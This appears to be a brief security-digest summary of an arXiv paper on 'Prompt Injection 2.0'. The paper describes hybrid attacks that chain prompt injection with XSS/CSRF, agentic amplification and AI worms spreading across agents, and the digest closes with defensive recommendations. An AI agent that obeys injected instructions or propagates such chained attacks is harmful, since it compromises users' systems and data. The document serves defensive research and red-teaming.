arXiv — Prompt Injection 2.0: hybrid AI threats

AI relevance: The paper connects prompt injection with classic web exploits (XSS/CSRF) to explain how agentic systems amplify blended attacks.

• The authors frame “Prompt Injection 2.0” as a hybrid threat model where LLM instruction hijacks pair with web-layer exploits.
• They argue agentic workflows make exploitation more reliable by automating multi-step tool use once a prompt is compromised.
• Attack examples include injection + XSS/CSRF chaining to bypass traditional web defenses in AI-integrated apps.
• The paper emphasizes AI worms and multi-agent propagation as a plausible escalation path.
• It highlights gaps in existing mitigations that focus on prompt filters without runtime isolation.
• Proposed defenses combine prompt isolation, privilege separation, and runtime monitoring across tools and agents.
• It calls for benchmarks that measure hybrid attack success, not just prompt-level jailbreak rates.

Why it matters

• Hybrid attacks target the entire AI+web stack, so prompt filters alone won’t stop them.
• Agentic automation can turn a single injection into multi-step compromise across systems.
• Security teams need cross-layer testing that mirrors real AI app deployments.

What to do

• Isolate tools and permissions: treat tool calls like privileged APIs with allowlists and scopes.
• Test hybrid chains: combine prompt injection with web vulnerabilities in red-team suites.
• Instrument runtime telemetry: monitor tool invocation patterns and anomalous data access.

Sources

• arXiv:2507.13169 — Prompt Injection 2.0: Hybrid AI Threats
• arXiv HTML (experimental)
• PDF
• DOI: 10.48550/arXiv.2507.13169